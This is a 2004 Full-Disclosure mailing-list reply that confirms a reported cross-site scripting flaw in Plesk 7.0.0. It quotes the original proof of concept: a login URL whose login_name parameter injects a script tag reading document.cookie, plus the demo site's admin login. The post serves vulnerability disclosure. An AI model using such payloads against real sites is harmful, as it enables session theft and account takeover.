Re: [Full-Disclosure] XSS in Plesk 7.1 Reloaded

From: Juan Carlos Navea (loconet_at_gmail.com)
Date: 08/24/04

  • Next message: defiance: "Re: [Full-Disclosure] Using CHKROOTKIT"
    To: sourvivor <sourvivor@phreaker.net>
    Date: Tue, 24 Aug 2004 10:01:14 -0400
    
    

    I can confirm this on Plesk 7.0.0 . Also tried it on Plesk 6.0 but it
    seems to be unaffected.

    On Tue, 24 Aug 2004 11:52:55 +0200, sourvivor <sourvivor@phreaker.net> wrote:
    > This bug was tested only in website plesk demo (plesk 7.1 reloaded).
    >
    > proof of concept:
    > Login first in http://plesk7r.demo.sw-soft.com:8443/ (Login: admin ,
    > password: plesk), then go to:
    > http://plesk7r.demo.sw-soft.com:8443/login_up.php3?login_name="><script>alert(document.cookie)</script><"&passwd=TheSur
    >
    > Sourvivor,
    > www.thesur.com/sourvivor/sourvivor.asc
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

    -- 
    http://scott.telnetd.com/loco/
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    

  • Next message: defiance: "Re: [Full-Disclosure] Using CHKROOTKIT"

    Relevant Pages